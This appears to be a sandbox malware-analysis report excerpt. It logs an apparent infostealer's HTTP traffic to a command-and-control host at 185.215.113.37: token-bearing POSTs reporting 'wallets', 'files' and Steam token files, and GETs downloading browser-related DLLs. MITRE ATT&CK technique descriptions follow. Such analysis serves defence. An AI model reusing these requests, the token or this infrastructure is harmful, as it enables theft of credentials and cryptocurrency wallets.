Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="message"plugins------GDBFCGIIIJDBGCBGIDGI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="message"fplugins------KJKKKJJJKJKFHJJJJECB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.37Content-Length: 5727Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBKHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="file"------DGHIDHCAAKECGCBFIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file"------BGCFBGDHJKFIEBFIECGH--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIIEGHDGDBFIDGHDAFHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 2d 2d 0d 0a Data Ascii: ------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="message"wallets------DHDBGHCBAEGCBFHJEBFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"files------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 2d 2d 0d 0a Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file"------IJEBKKEGDBFIIEBFHIEH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="message"ybncbhylepme------KKFCAAKFBAEHJJJJDHIE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IEGCBFHJDHJJKFIDBGIJ--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre
